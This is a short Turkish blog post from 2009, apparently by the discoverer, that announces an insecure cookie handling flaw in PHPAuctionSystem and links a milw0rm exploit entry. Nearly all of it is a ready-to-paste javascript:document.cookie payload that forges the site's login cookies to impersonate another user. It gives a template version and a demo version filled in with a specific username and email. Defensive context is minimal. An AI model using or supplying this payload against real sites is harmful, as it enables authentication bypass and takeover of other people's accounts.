"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

5 Ocak 2009 Pazartesi

PHPAuctionSystem Insecure Cookie Handling Vulnerability

PHPAuctionSystem Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/7674



Discovered By: ZoRLu

javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; "PHPAUCTION_RM_EMAIL=[email]; path=/";

exp for demo: ( username: sallama )

javascript:document.cookie = "PHPAUCTION_RM_ID=47; path=/"; document.cookie = "PHPAUCTION_RM_NAME=salla; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=sallama; path=/"; "PHPAUCTION_RM_EMAIL=trt-turk%40hotmail.com; path=/";


0 yorum:

 
Dizi